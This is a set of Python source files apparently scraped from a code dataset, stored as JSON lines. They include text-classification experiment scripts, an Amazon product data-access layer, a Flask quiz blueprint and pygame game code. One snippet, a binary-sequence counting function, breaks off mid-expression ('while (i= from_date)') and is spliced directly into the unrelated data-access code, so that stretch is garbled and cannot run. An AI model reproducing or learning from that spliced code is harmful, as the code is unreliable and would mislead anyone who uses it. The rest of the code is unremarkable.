print(\"np.max=\", np.max(abs(X)))\n\n        if config['experiment_mode'] == 'feature_selection' or config['experiment_mode'] == 'print_important_features':\n            result = exp.run_cross_validation_with_discrete_feature_selection(X, Y)\n        elif config['experiment_mode'] == 'leave_one_out' or config['experiment_mode'] == 'keep_one_only':\n            result = exp.run_cross_validation_with_leave_one_out(X, Y)\n        elif config['experiment_mode'] == 'reformulation_detection' or config['experiment_mode'] == 'task_boundary_detection':\n            result = exp.run_cross_validation_binary_task(X, Y)\n        elif config['experiment_mode'] == 'bad_case':\n            result = exp.run_cross_validation_bad_case(X, Y)\n        elif config['experiment_mode'] == 'normal_cv':\n            result = exp.run_cross_validation(X, Y)\n        elif config['experiment_mode'] == 'single_run':\n            result = exp.run_single_pass(X, Y)\n        elif config['experiment_mode'] == 'single_run_context_feature':\n            result = exp.run_single_pass_context_feature(X, Y)\n        else:\n            assert \"experiment type invalid\"\n\n        # find the best classifier (with best F1-score)\n        # result = result[np.asarray(result).T[4].argmax()]\n        # best_results[data_name] = result\n\n        \"\"\"\n    # exp.export_summary(best_results.values(), os.path.join(config.param['experiment_path'], 'best_of_each_dataset.csv'))","sub_path":"dialogue/deprecated/classify/entry_cv.py","file_name":"entry_cv.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"551242889","text":"# https://www.geeksforgeeks.org/count-even-length-binary-sequences-with-same-sum-of-first-and-second-half-bits/\n\ndef countSeq(n):\n    countSeqArr = [-1]*(n+1)\n    countSeqArr[0] = 1\n    i = 1\n    SUM = 1\n    while (i= from_date),\n                Bsr.date < to_date,\n                Bsr.asin.IN(set_asins))\n        bsr_entities = 
query.fetch()\n return bsr_entities\n \n def getKeywordRanks(self, list_asins, list_keywords, from_date, to_date):\n set_asins = set(list_asins)\n set_keywords = set(list_keywords)\n query = KeywordRank.query(\n ndb.AND(KeywordRank.date >= from_date),\n KeywordRank.date < to_date,\n KeywordRank.keyword.IN(set_keywords),\n KeywordRank.asin.IN(set_asins))\n keyword_entities = query.fetch()\n return keyword_entities\n \n def getKeywords(self):\n return self.lKeywords\n \n def getProductSearchLimit(self):\n return 25\n \n def getAsins(self):\n return self.lAsins\n \n def getBaziliqAsin(self):\n return self.baziliq_asin\n \n def updateProductByProperties(self, db_product, amazon_product, amazon_api_access_layer, property_names_to_update = None):\n ''' parameters: db_product - ProductListing\n amazon_product - AmazonProduct\n amazon_api_access_layer - AmazonDataAccessLayer\n property_names_to_update - list of changed property names\n \n updating db_product with all the changes from amazon_product, and writing the up-to-date product back to the Datastore\n '''\n if not property_names_to_update:\n return\n \n need_to_update = False\n for property_name in property_names_to_update:\n if property_name == 'title' and db_product.title != amazon_product.title:\n db_product.title = amazon_product.title\n need_to_update = True\n elif property_name == 'author' and db_product.author != amazon_product.author:\n db_product.author = amazon_product.author\n need_to_update = True\n elif property_name == 'brand' and db_product.brand != amazon_product.brand:\n db_product.brand = amazon_product.brand\n need_to_update = True\n elif property_name == 'binding' and db_product.binding != amazon_product.binding:\n db_product.binding = amazon_product.binding\n need_to_update = True\n elif property_name == 'label' and db_product.label != amazon_product.label:\n db_product.label = amazon_product.label\n need_to_update = True\n elif property_name == 'price':\n if not amazon_product.price_and_currency[0] or db_product.price != float(amazon_product.price_and_currency[0]):\n try:\n db_product.price = float(amazon_product.price_and_currency[0])\n except TypeError:\n db_product.price = None\n need_to_update = True\n elif property_name == 'manufacturer' and db_product.manufacturer != amazon_product.manufacturer:\n db_product.manufacturer = amazon_product.manufacturer\n need_to_update = True\n elif property_name == 'url' and db_product.url != amazon_api_access_layer.getProductUrl(amazon_product):\n db_product.url = amazon_api_access_layer.getProductUrl(amazon_product)\n need_to_update = True\n elif property_name == 'features' and db_product.features != amazon_product.features:\n db_product.features = amazon_product.features\n need_to_update = True\n elif property_name == 'image_urls' and \\\n set(db_product.image_urls) != set([lxml.etree.tostring(image.LargeImage.URL) for image in amazon_product.images]):\n db_product.image_urls = [lxml.etree.tostring(image.LargeImage.URL) for image in amazon_product.images]\n need_to_update = True\n elif property_name == 'reviews':\n db_product.reviews = {star: amazon_api_access_layer.getReviews(amazon_product, star) \\\n for star in xrange(1,6)}\n need_to_update = True\n \n if need_to_update:\n db_product.put()\n \n \n def getProductChangeHistory(self, asin, from_date = datetime.datetime.now(), to_date = datetime.datetime.now()):\n from_date = from_date.replace(hour=0, minute=0, second=0, microsecond=0) # beginning of the day\n to_date = to_date.replace(hour=23, minute=59, second=59, 
microsecond=0) # end of the day\n query = ProductChangeHistory.query(\n ndb.AND(ProductChangeHistory.creation_date >= from_date),\n ProductChangeHistory.creation_date < to_date,\n ProductChangeHistory.asin == asin).get()\n product_change_history = query.fetch(100)\n \n if not product_change_history:\n logging.debug('ProductChangeHistory not found')\n else:\n logging.debug('found %d ProductChangeHistory', len(product_change_history))\n \n return product_change_history\n ","sub_path":"x-sell/amzmri/dal/xsellDataAccessLayer.py","file_name":"xsellDataAccessLayer.py","file_ext":"py","file_size_in_byte":6776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"101498302","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# Importing libraries\r\nimport os\r\nimport re\r\nimport logging\r\nimport pandas as pd\r\nimport numpy as np\r\nimport nltk.data\r\nfrom bs4 import BeautifulSoup\r\nfrom nltk.corpus import stopwords\r\nfrom gensim.models.word2vec import Word2Vec\r\nfrom sklearn import naive_bayes, svm, preprocessing\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.ensemble import RandomForestClassifier as RFC\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.feature_selection.univariate_selection import chi2, SelectKBest\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.model_selection import cross_val_predict\r\n# import scikitplot as skplt\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.calibration import CalibratedClassifierCV\r\nimport time\r\n\r\n\r\n# Pre-processing movie reviews\r\ndef clean_review(raw_review):\r\n # Remove HTML markup\r\n text = BeautifulSoup(raw_review, features=\"html.parser\")\r\n\r\n # Removing digits and punctuation\r\n text = re.sub(\"[^a-zA-Z]\", \" \", text.get_text())\r\n\r\n # Converting to lowercase\r\n text = text.lower().split()\r\n\r\n # Removing stopwords\r\n stops = set(stopwords.words(\"english\"))\r\n words = [w for w in text if w not in stops]\r\n\r\n # Return a cleaned string\r\n return \" \".join(words)\r\n\r\n\r\n# Generates a feature vector(word2vec averaging) for each movie review\r\ndef review_to_vec(words, model, num_features):\r\n \"\"\"\r\n This function generates a feature vector for the given review.\r\n Input:\r\n words: a list of words extracted from a review\r\n model: trained word2vec model\r\n num_features: dimension of word2vec vectors\r\n Output:\r\n a numpy array representing the review\r\n \"\"\"\r\n\r\n feature_vec = np.zeros((num_features), dtype=\"float32\")\r\n word_count = 0\r\n\r\n # index2word_set is a set consisting of all words in the vocabulary\r\n index2word_set = set(model.index2word)\r\n\r\n for word in words:\r\n if word in index2word_set:\r\n word_count += 1\r\n feature_vec += model[word]\r\n\r\n feature_vec /= word_count\r\n return feature_vec\r\n\r\n\r\n# Generates vectorized movie reviews\r\ndef gen_review_vecs(reviews, model, num_features):\r\n \"\"\"\r\n Function which generates a m-by-n numpy array from all reviews,\r\n where m is len(reviews), and n is num_feature\r\n Input:\r\n reviews: a list of lists.\r\n Inner lists are words from each review.\r\n Outer lists consist of all reviews\r\n model: trained word2vec model\r\n 
num_feature: dimension of word2vec vectors\r\n Output: m-by-n numpy array, where m is len(review) and n is num_feature\r\n \"\"\"\r\n\r\n curr_index = 0\r\n review_feature_vecs = np.zeros((len(reviews), num_features), dtype=\"float32\")\r\n\r\n for review in reviews:\r\n\r\n if curr_index % 1000 == 0.:\r\n print(\"Vectorizing review %d of %d\" % (curr_index, len(reviews)))\r\n\r\n review_feature_vecs[curr_index] = review_to_vec(review, model, num_features)\r\n curr_index += 1\r\n\r\n return review_feature_vecs\r\n\r\n\r\n# TFIDF vectorization\r\ndef tfidf_vectorizer(train_list, test_list, train_data, test_data):\r\n stop_words_list = [\"ke\",\"ka\",\"ek\",\"mein\",\"kee\", \"hai\",\"yah\",\"aur\",\"se\",\"hain\",\"ko\",\"par\",\"is\",\"hota\",\"ki\", \"jo\",\"kar\", \"me\", \"gaya\", \"karane\", \"kiya\",\"liye\",\r\n \"apane\", \"ne\", \"banee\", \"nahin\", \"to\", \"hee\",\"ya\",\"evan\", \"diya\", \"ho\",\"isaka\", \"tha\",\"dvaara\", \"hua\",\"tak\",\"saath\",\"karana\",\"vaale\", \"baad\",\r\n \"lie\", \"aap\", \"kuchh\", \"sakate\",\"kisee\", \"ye\", \"isake\", \"sabase\", \"isamen\", \"the\", \"do\", \"hone\",\"vah\",\"ve\",\"karate\",\"bahut\",\"kaha\", \"varg\",\r\n \"kaee\",\"karen\",\"hotee\", \"apanee\",\"unake\", \"thee\", \"yadi\",\"huee\",\"ja\", \"na\", \"ise\", \"kahate\", \"jab\",\"hote\", \"koee\",\"hue\", \"va\", \"na\",\"abhee\",\r\n \"jaise\",\"sabhee\", \"karata\", \"unakee\", \"tarah\", \"us\", \"aadi\", \"kul\", \"es\",\"raha\", \"isakee\",\"sakata\", \"rahe\",\"unaka\",\"isee\",\"rakhen\", \"apana\", \"pe\",\"usake\"]\r\n for i in range(0, len(train_data.review)):\r\n\r\n # Append raw texts as TFIDF vectorizers take raw texts as inputs\r\n train_list.append(clean_review(train_data.review[i]))\r\n if i % 1000 == 0:\r\n print(\"Cleaning training review\", i)\r\n\r\n for i in range(0, len(test_data.review)):\r\n\r\n # Append raw texts as TFIDF vectorizers take raw texts as inputs\r\n test_list.append(clean_review(test_data.review[i]))\r\n if i % 1000 == 0:\r\n print(\"Cleaning test review\", i)\r\n # print(clean_review(test_data.review[i]))\r\n count_vec = TfidfVectorizer(min_df=0,max_df=0.6,ngram_range=(0, 1), sublinear_tf=True,norm='l2',stop_words=None)\r\n print(\"Vectorizing input texts\")\r\n train_vec = count_vec.fit_transform(train_list)\r\n test_vec = count_vec.transform(test_list)\r\n print(test_vec.shape)\r\n return train_vec, test_vec, count_vec\r\n\r\n\r\n# Performing dimensionality reduction using SelectKBest\r\ndef dimensionality_reduction(train_vec, test_vec, y_train_data):\r\n print(\"Performing feature selection based on chi2 independence test\")\r\n fselect = SelectKBest(chi2, k=4500)\r\n train_vec = fselect.fit_transform(train_vec, y_train_data)\r\n test_vec = fselect.transform(test_vec)\r\n return train_vec, test_vec\r\n\r\nfrom sklearn import metrics\r\n# Multinomial Naive Bayes classifier\r\ndef naive_bayes(train_vec, test_vec, y_train_data):\r\n start = time.time()\r\n nb = MultinomialNB(alpha=1)\r\n # param = {'alpha':[1e-1,0.3,0.7,0.9,1.1]}\r\n # nb = GridSearchCV(nb, param, cv=5, scoring=\"roc_auc\")\r\n # nb.fit(train_vec,y_train_data)\r\n # print(\"best_score:\",nb.best_score_)\r\n # print(\"best_etimator: \", nb.best_params_)\r\n cv_score = cross_val_score(nb, train_vec, y_train_data, cv=5,scoring=\"roc_auc\")\r\n print(\"Training Multinomial Naive Bayes\")\r\n nb = nb.fit(train_vec, y_train_data)\r\n pred_naive_bayes = nb.predict(test_vec)\r\n\r\n # print(pred_naive_bayes)\r\n print(\"CV Score = \", cv_score)\r\n print(\"Total time taken 
for Multinomial Naive Bayes is \", time.time() - start, \" seconds\")\r\n result = nb.predict_proba(test_vec)\r\n result = [i[1] for i in result]\r\n test_auc = metrics.roc_auc_score(np.array(test_label1), result) # 验证集上的auc值\r\n print(\"test_auc:\",test_auc)\r\n\r\n # print(result[:10])\r\n return pred_naive_bayes, result\r\n\r\n\r\n# Random Forest classifier\r\ndef random_forest(train_vec, test_vec, y_train_data):\r\n start = time.time()\r\n rfc = RFC(n_estimators=200, oob_score=True, max_features=\"auto\")\r\n cv_score = cross_val_score(rfc, train_vec, y_train_data, cv=5, scoring=\"roc_auc\")\r\n print(\"Training %s\" % (\"Random Forest\"))\r\n rfc = rfc.fit(train_vec, y_train_data)\r\n\r\n print(\"OOB Score =\",cv_score)\r\n pred_random_forest = rfc.predict(test_vec)\r\n print(\"Total time taken for Random Forest is \", time.time() - start, \" seconds\")\r\n\r\n return pred_random_forest\r\n\r\n\r\n# Linear SVC classifier\r\ndef linear_svc(train_vec, test_vec, y_train_data):\r\n start = time.time()\r\n svc = svm.LinearSVC(C=0.8, class_weight=None, dual=True, fit_intercept=True,\r\n intercept_scaling=1, loss='ovr', max_iter=1000,\r\n multi_class='crammer_singer', penalty='l2', random_state=None, tol=0.0001,\r\n verbose=0)\r\n # svc = CalibratedClassifierCV(svc)\r\n\r\n # param = {'max_iter': [10000], 'C': [1e15, 1e13, 1e11, 1e9, 1e7, 1e5, 1e3, 1e1, 1e-1, 1e-3, 1e-5]}\r\n # param = {'max_iter': [600,800,1000], 'C': [ 1e5,1e3, 1e1, 1e-1, 1e-3]}\r\n # print(\"Training SVC\")\r\n # svc = GridSearchCV(svc, param, cv=5)\r\n # svc = svc.fit(train_vec, y_train_data)\r\n # # pred_linear_svc = svc.predict(test_vec)\r\n # print(\"Optimized parameters:\", svc.best_estimator_)\r\n # print(\"Best CV score:\", svc.best_score_)\r\n # print(\"Total time taken for Linear SVC is \", time.time() - start, \" seconds\")\r\n # print(\"Generating confusion matrix\")\r\n svc1 = CalibratedClassifierCV(svc)\r\n svc1.fit(train_vec,y_train_data)\r\n result = svc1.predict_proba(test_vec)\r\n\r\n svc_score = cross_val_score(svc,train_vec,y_train_data,cv=5,scoring=\"roc_auc\")\r\n print(\"svc roc:\",svc_score)\r\n svc = svc.fit(train_vec, y_train_data)\r\n pred_linear_svc = svc.predict(test_vec)\r\n\r\n result = [i[1] for i in result]\r\n test_auc = metrics.roc_auc_score(np.array(test_label1), result) # 验证集上的auc值\r\n print(\"test_auc:\", test_auc)\r\n # Below confusion matrix code is commented as it takes a lot of time to run. 
The plots have been added in the project report.\r\n # predictions = cross_val_predict(svc, train_vec, y_train_data)\r\n # skplt.metrics.plot_confusion_matrix(y_train_data, predictions)\r\n # plt.show()\r\n print(result[:10])\r\n return pred_linear_svc,result\r\n\r\n\r\n# SVM Classifier using cross validation\r\ndef svm_cross_validation(train_x, test_ver, train_y):\r\n from sklearn.svm import SVC\r\n model = SVC(kernel='rbf', probability=True)\r\n param_grid = {'C': [0.01,0.1,1, 10, 100, 1000,1500,2000], 'gamma': [0.1,0.01,0.001]}\r\n grid_search = GridSearchCV(model, param_grid, verbose=1, cv=5)\r\n grid_search.fit(train_x, train_y)\r\n print(\"svc best score:\",grid_search.best_score_)\r\n best_parameters = grid_search.best_estimator_.get_params()\r\n for para, val in list(best_parameters.items()):\r\n print(para, val)\r\n model = SVC(kernel='rbf', C=best_parameters['C'], gamma=best_parameters['gamma'], probability=True)\r\n model.fit(train_x, train_y)\r\n predict_res = model.predict(test_ver)\r\n print(predict_res[:10])\r\n\r\n return predict_res\r\n\r\n\r\n# Logistic Regression\r\ndef logistic_regression(train_vec, test_vec, y_train_data):\r\n start = time.time()\r\n # clf = LogisticRegression(random_state=0, solver='liblinear', max_iter=10000, multi_class='multinomial')\r\n clf = LogisticRegression(random_state=0, solver='newton-cg', max_iter=5000, multi_class='multinomial',class_weight='balanced',C=1.5)\r\n cv_score = cross_val_score(clf, train_vec, y_train_data, cv=5, scoring='roc_auc')\r\n print(\"Training Logistic Regression\")\r\n clf = clf.fit(train_vec, y_train_data)\r\n pred_logistic = clf.predict(test_vec)\r\n print(\"CV Score = \", cv_score)\r\n print(\"Total time taken for Logistic is \", time.time() - start, \" seconds\")\r\n print(\"Plotting Precision recall curve\")\r\n result = clf.predict_proba(test_vec)\r\n # print(result[:15])\r\n # skplt.metrics.plot_precision_recall(y_train_data, result)\r\n result = [i[1] for i in result]\r\n test_auc = metrics.roc_auc_score(np.array(test_label1), result) # 验证集上的auc值\r\n print(\"test_auc:\", test_auc)\r\n # plt.show()\r\n return pred_logistic, result\r\n\r\nimport xgboost as xgb\r\ndef xgboost_test(train_vec, test_vec, y_train_data):\r\n dtrain = xgb.DMatrix(train_vec, label=y_train_data)\r\n dtest = xgb.DMatrix(test_vec)\r\n params = {'booster': 'gbtree',\r\n 'objective': 'binary:logistic',\r\n 'eval_metric': 'auc',\r\n 'max_depth': 4,\r\n 'lambda': 10,\r\n 'subsample': 0.75,\r\n 'colsample_bytree': 0.75,\r\n 'min_child_weight': 2,\r\n 'eta': 0.025,\r\n 'seed': 0,\r\n 'nthread': 8,\r\n 'silent': 1}\r\n watchlist = [(dtrain, 'train')]\r\n bst = xgb.train(params, dtrain, num_boost_round=5, evals=watchlist)\r\n # # 输出概率\r\n # ypred = bst.predict(dtest)\r\n # print(ypred)\r\n # print(type(train_vec))\r\n # print(type(y_train_data))\r\n # data_train = xgb.DMatrix(train_vec, label=y_train_data)\r\n #\r\n # data_test = xgb.DMatrix(test_vec, label=test_label1)\r\n # watch_list = [(data_test, 'eval'), (data_train, 'train')]\r\n # params = {'max_depth': 1, 'eta': 0.9, 'silent': 1, 'objective': 'multi:softmax', 'num_class': 3}\r\n # bst = xgb.train(params, data_train, num_boost_round=7, evals=watch_list)\r\n # y_train_pred = bst.predict(data_train)\r\n # y_test_pred = bst.predict(data_test)\r\n # print('XGBoost训练集准确率:', accuracy_score(y_train_data, y_train_pred))\r\n # print('XGBoost测试集准确率:', accuracy_score(test_label1, y_test_pred))\r\n # return y_test_pred\r\n\r\n\r\n\r\n# Word2Vec vectorization\r\ndef word2vec(train_data, test_data, 
train_list, test_list):\r\n model_name = \"GoogleNews-vectors-negative300.bin.gz\"\r\n model_type = \"bin\"\r\n num_features = 300\r\n for i in range(0, len(train_data.review)):\r\n train_list.append(clean_review(train_data.review[i]))\r\n if i % 1000 == 0:\r\n print(\"Cleaning training review\", i)\r\n for i in range(0, len(test_data.review)):\r\n test_list.append(clean_review(test_data.review[i]))\r\n if i % 1000 == 0:\r\n print(\"Cleaning test review\", i)\r\n print(\"Loading the pre-trained model\")\r\n # The below part has been commented as the model was loaded, movie reviews were vectorized and stored in below pkl files,\r\n # as this takes a lot of time to execute.\r\n # We are reading the pkl files to get the final vectorized data\r\n\r\n # model = Word2Vec.load_word2vec_format(model_name, binary=True)\r\n print(\"Vectorizing training review\")\r\n # train_vec = gen_review_vecs(train_list, model, num_features)\r\n # print (\"Vectorizing test review\")\r\n # test_vec = gen_review_vecs(test_list, model, num_features)\r\n\r\n # print(\"Writing to DataFrame after vectorizing\")\r\n # df_train = pd.DataFrame(train_vec)\r\n # df_test = pd.DataFrame(test_vec)\r\n # df_train.to_pickle(\"train.pkl\")\r\n # df_test.to_pickle(\"test.pkl\")\r\n\r\n\r\n y_train_data = train_data.sentiment\r\n train_df = pd.read_pickle(\"train.pkl\")\r\n test_df = pd.read_pickle(\"test.pkl\")\r\n\r\n # Word2Vec cannot be used with Multinomial Naive Bayes as Multinomial Naive Bayes does not work with negative values\r\n pred_logistic = logistic_regression(train_df, test_df, y_train_data)\r\n pred_random_forest = random_forest(train_df, test_df, y_train_data)\r\n pred_linear_svc ,result= linear_svc(train_df, test_df, y_train_data)\r\n\r\n output = pd.DataFrame(data={\"id\": test_data.id, \"Pre\": [result[0] for i in result]})\r\n output.to_csv(\"word2vec_svc.csv\", index=False)\r\n\r\n\r\n# Testing a custom movie review\r\ndef test_custom_review(count_vec, train_vec, y_train_data):\r\n print('\\nTest a custom review message')\r\n print('Enter review to be analysed: ', end=\" \")\r\n\r\n test = []\r\n test_list = []\r\n test.append(input())\r\n test_review = pd.DataFrame(data={\"id\": 1, \"review\": test})\r\n print(\"Cleaning the test review\")\r\n for i in range(0, len(test_review.review)):\r\n test_list.append(clean_review(test_review.review[i]))\r\n print(\"Vectorizing the test review\")\r\n test_review_vec = count_vec.transform(test_list)\r\n print(\"Predicting\")\r\n pred_naive_bayes = naive_bayes(train_vec, test_review_vec, y_train_data)\r\n if (pred_naive_bayes == 1):\r\n print(\"The review is predicted positive\")\r\n else:\r\n print(\"The review is predicted negative\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from sklearn.preprocessing import OneHotEncoder\r\n\r\n from sklearn.preprocessing import LabelEncoder\r\n train_list = []\r\n test_list = []\r\n word2vec_input = []\r\n\r\n pred_naive_bayes = []\r\n pred_logistic = []\r\n pred_random_forest = []\r\n pred_linear_svc = []\r\n # train_data = pd.read_csv(\"train.csv\", header=0, delimiter=\"\\t\", quoting=0)\r\n train_data = pd.read_csv(\"./train.csv\", lineterminator='\\n')\r\n # test_data = pd.read_csv(\"20190506_test.csv\", header=0, delimiter=\"\\t\", quoting=0)\r\n test_data = pd.read_csv(\"./20190513_test.csv\", lineterminator='\\n')\r\n # print(test_data[:10])\r\n y_train_data = train_data.label\r\n\r\n\r\n # onehot_encoder = OneHotEncoder(sparse=False)\r\n # integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\r\n # 
onehot_encoded = onehot_encoder.fit_transform(integer_encoded)\r\n # print(onehot_encoded)\r\n\r\n # print(y_train_data[:10])\r\n # print(train_data.shape[0])\r\n train_data1 = train_data[int(0.2*train_data.shape[0]):]\r\n test_data1 = train_data[:int(0.2*train_data.shape[0])]\r\n # print(test_data1.shape[0])\r\n train_data1 = train_data1.reset_index(drop=True)\r\n # test_data1 = pd.DataFrame(test_data1,index=[1,2])\r\n # for i in range(test_data1.shape[0]):\r\n # test_data1.iloc[i,0] = i+1\r\n # print(test_data1)\r\n train_label1 = y_train_data[int(0.2*train_data.shape[0]):]\r\n test_label1 = y_train_data[:int(0.2*train_data.shape[0])]\r\n train_label1=train_label1.reset_index(drop=True)\r\n # print(test_label1[:10])\r\n label_encoder = LabelEncoder()\r\n train_label1 = label_encoder.fit_transform(train_label1)\r\n print(train_label1.shape)\r\n\r\n label_encoder = LabelEncoder()\r\n test_label1 = label_encoder.fit_transform(test_label1)\r\n print(test_label1.shape)\r\n\r\n # Vectorization - TFIDF\r\n print(\"Using TFIDF \")\r\n train_vect, test_vec, count_vec = tfidf_vectorizer(train_list, test_list, train_data1, test_data1)\r\n\r\n print(train_vect.shape)\r\n\r\n # Dimensionality Reduction\r\n # train_vect, test_vec = dimensionality_reduction(train_vect, test_vec, train_label1)\r\n # cc = xgboost_test(train_vect, test_vec, train_label1)\r\n # train_vec1 = train_vec[:9*len(train_vec)]\r\n # y_train_data1 = y_train_data[:9*len(y_train_data)]\r\n # test_vec1 = train_vec[9*len(train_vec):]\r\n # y_test_data1 = y_train_data[9*len(y_train_data):]\r\n\r\n # Prediction\r\n # pred_naive_bayes, result1 = naive_bayes(train_vect, test_vec, train_label1)\r\n # pred_random_forest = random_forest(train_vect, test_vec, train_label1)\r\n\r\n # pred_logistic, result2 = logistic_regression(train_vect, test_vec, train_label1)\r\n\r\n # pred_linear_svc, result3= linear_svc(train_vect, test_vec, train_label1)\r\n\r\n # result4 = (np.array(result1)+np.array(result2)+np.array(result3))/3\r\n # test_auc = metrics.roc_auc_score(np.array(test_label1), result4) # 验证集上的auc值\r\n # print(\"test_auc_end:\", test_auc)\r\n # pre_svc = svm_cross_validation(train_vec,test_vec,y_train_data)\r\n # Writing output of classifier with highest accuracy(Linear SVC)to csv\r\n # print(result4[:10])\r\n # output = pd.DataFrame(data={\"ID\": test_data.ID, \"Pred\": [i for i in result4]})\r\n\r\n # output.to_csv(\"tfidf_svc.csv\", index=False)\r\n\r\n # print(\"Using pre-trained word2vec model\")\r\n # train_list = []\r\n # test_list = []\r\n # pred_logistic = []\r\n # pred_random_forest = []\r\n # pred_linear_svc = []\r\n #\r\n # word2vec(train_data, test_data, train_list, test_list)\r\n #\r\n # # Test a custom review using Multinomial Naive Bayes\r\n # test_custom_review(count_vec, train_vect, y_train_data)","sub_path":"version2.py","file_name":"version2.py","file_ext":"py","file_size_in_byte":18893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"230859528","text":"from flask import Blueprint, redirect, url_for, request\nfrom seventeen import resources as r\nfrom seventeen.utils import templated\nfrom seventeen.models import Quiz\n\nblueprint = Blueprint('web', __name__,\n\ttemplate_folder='templates',\n\tstatic_folder='static',\n\t)\n\n@blueprint.route('/')\n@templated('index.html')\ndef index():\n\treturn {'quizzes': Quiz.objects()}\n\n@blueprint.route('/quizzes/<slug>')\n@templated('update_quiz_page.html')\ndef update_quiz_page(slug):\n\tquiz = 
Quiz.objects.get_or_404(slug=slug)\n\treturn {'quiz': quiz}\n\n@blueprint.route('/quizzes/create_quiz', methods=['GET'])\n@templated('create_quiz_page.html')\ndef create_quiz_page():\n\treturn {}\n\n@blueprint.route('/quizzes/', methods=['POST'])\ndef create_quiz():\n\tquiz = Quiz(\n\t\ttitle=request.form['title'],\n\t\tslug=request.form['slug'],\n\t\t)\n\tquiz.save()\n\treturn redirect(url_for('web.update_quiz_page', slug=quiz.slug))\n\n@blueprint.route('/quizzes/<slug>', methods=['POST'])\ndef update_quiz(slug):\n\tquiz = Quiz.objects.get_or_404(slug=slug)\n\tquiz.title = request.form['title']\n\tquiz.slug = request.form['slug']\n\tquiz.save()\n\treturn redirect(url_for('web.update_quiz_page', slug=quiz.slug))\n\n@blueprint.route('/quizzes/<slug>/delete', methods=['POST'])\ndef delete_quiz(slug):\n\tquiz = Quiz.objects.get_or_404(slug=slug)\n\tquiz.delete()\n\treturn redirect(url_for('web.index'))\n","sub_path":"seventeen/web/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"244063801","text":"#关卡切换部分\n\n# 关卡切换\ndef show_switch_stage(screen, width, height, stage):\n\tbg_img = pygame.image.load(\"./images/others/background.png\")\n\tscreen.blit(bg_img, (0, 0))\n\tfont = pygame.font.Font('./font/simhei.ttf', width//10)\n\tcontent = font.render(u'第%d关' % stage, True, (0, 255, 0))\n\trect = content.get_rect()\n\trect.midtop = (width/2, height/2)\n\tscreen.blit(content, rect)\n\tpygame.display.update()\n\tdelay_event = pygame.constants.USEREVENT\n\tpygame.time.set_timer(delay_event, 1000)\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\texit()\n\t\t\tif event.type == delay_event:\n\t\t\t\treturn\n","sub_path":"项目进展7.py","file_name":"项目进展7.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"246124211","text":"# -*- coding: utf-8 -*- \n\nimport pygame\nimport os\nimport sys\nimport random\n\n# 게임 스크린 크기\nSCREEN_WIDTH = 480\nSCREEN_HEIGHT = 640\n\n# 색 정의\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nBLUE = (20, 60, 120)\nORANGE = (250, 170, 70)\nRED = (250, 0, 0)\n\nFPS = 60\n\n\n# 공 객체\nclass Ball(object):\n def __init__(self, bounce_sound):\n self.rect = pygame.Rect(int(SCREEN_WIDTH / 2), int(SCREEN_HEIGHT / 2), 12, 12)\n self.bounce_sound = bounce_sound\n self.dx = 0\n self.dy = 5\n\n # 공 업데이트\n def update(self):\n self.rect.x += self.dx\n self.rect.y += self.dy\n\n # 공이 게임 화면 왼쪽으로 넘어갈 때\n if self.rect.left < 0:\n self.dx *= -1\n self.rect.left = 0\n self.bounce_sound.play()\n # 공이 게임 화면 오른쪽으로 넘어갈 때\n elif self.rect.right > SCREEN_WIDTH:\n self.dx *= -1\n self.rect.right = SCREEN_WIDTH\n self.bounce_sound.play()\n\n # 공 리셋\n def reset(self, x, y):\n self.rect.x = x\n self.rect.y = y\n self.dx = random.randint(-3, 3)\n self.dy = 5\n\n # 공 그리기\n def draw(self, screen):\n pygame.draw.rect(screen, ORANGE, self.rect)\n\n\n# 플레이어 객체\nclass Player(object):\n def __init__(self, ping_sound):\n self.rect = pygame.Rect(int(SCREEN_WIDTH / 2), SCREEN_HEIGHT - 40, 50, 15)\n self.ping_sound = ping_sound\n self.dx = 0\n\n # 업데이트\n def update(self, ball):\n if self.rect.left <= 0 and self.dx < 0:\n self.dx = 0\n elif self.rect.right >= SCREEN_WIDTH and self.dx > 0:\n self.dx = 0\n # 플레이어가 공이랑 충돌한 경우\n if self.rect.colliderect(ball.rect):\n ball.dx = random.randint(-5, 5)\n ball.dy *= -1\n ball.rect.bottom = self.rect.top\n 
